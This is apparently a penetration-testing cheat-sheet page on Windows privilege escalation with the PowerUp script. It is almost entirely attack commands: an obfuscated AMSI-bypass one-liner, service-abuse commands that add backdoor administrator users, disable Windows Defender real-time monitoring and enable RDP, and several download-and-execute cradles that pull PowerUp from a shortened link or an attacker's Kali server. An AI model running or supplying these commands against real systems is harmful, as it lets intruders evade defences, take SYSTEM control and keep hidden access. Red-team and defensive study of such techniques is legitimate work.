PowerUp Exploits

PreviousLateral Movement NextIII. Domain Privilege Escalation

Last updated 4 years ago

Was this helpful?

PowerUp Exploits

Import PowerUp

powershell -ep bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Import-Module PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

ServiceName: This is the name of the service
Path: This is where the program is located or run from
ModifiableFile: If we can abuse this service, this is the file that will be modified
StartName: This is who the service runs as. It is important that this user has higher privileges than our current privileges, otherwise it will be pointless in exploiting it. Generally we would like if it is running with LocalSystem, or Administrator privileges.
CanRestart: It is important this is True. We must have the ability to restart the service otherwise the changes can’t take place to escalate our privileges. If you have access to restart the machine that’s an option, but we generally want to avoid restarting machines if possible.
AbuseFunction: If we type in this command as-is, PowerUp.ps1 will exploit the service automatically and add a user named john with a password of Password123! to the administrator’s group. (This can be changed of course but this is the default configuration.)

vulnerable service executable

This misconfiguration happens when the executable associated with a service has improper permissions, allowing other users to write to the .exe. Since these services run as SYSTEM, if we replace the exe with our own, we can escalate quickly. PowerUp includes a function to easily back up the service .exe and write out a patched C# service to that service location. If it succeeds, it returns True, and returns False if it fails. We can use the -Verbose flag to get some more information:

Write-ServiceEXE -ServiceName <servicename> -UserName backdoor -Password password123 -Verbose

This new service binary will create a new user named backdoor, and add them to the local administrators. If we can’t start/stop the service, rebooting the box should do the trick to get the user added.

#Running the below command should place the original binary back in its proper place
Restore-ServiceEXE -ServiceName CustomSVC

Sometimes services themselves are vulnerable- if we can modify a service and start/stop it, we can change the path name to the service exe to be something like “net user backdoor2 /add”. If we start/stop the service and then repeat that process to add the user to the local administrators, we’re golden:

 Invoke-ServiceUserAdd -ServiceName <ServiceName> -UserName backdoor2 -Password password123 -Verbose

AlwaysInstallElevated key

Write-UserAddMSI

Customizing the Exploit

Adding a new user with password with -User and -Password options

Invoke-ServiceAbuse -Name 'AbyssWebServer' -User hacker -Password Password1337

Running a custom command (Disable Windows Defender)

Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

Running a custom command (Enable RDP services)PowerShell

Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command "reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

Running PowerUp.ps1 Without Touching Disk

Load Directly From Github

PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")

Loading From Your Kali Apache Server

PS C:\> IEX(New-Object Net.WebClient).DownloadString(‘http://<kali_ip>/PowerUp.ps1’)

PowerShell Version 3 And Above

PS C:\> iex (iwr 'http://<kali_ip>/PowerUp.ps1')

Alternative Method

PS C:\> $wr = [System.NET.WebRequest]::Create("http://<kali_ip>/PowerUp.ps1") 
PS C:\> $r = $wr.GetResponse()
PS C:\> IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()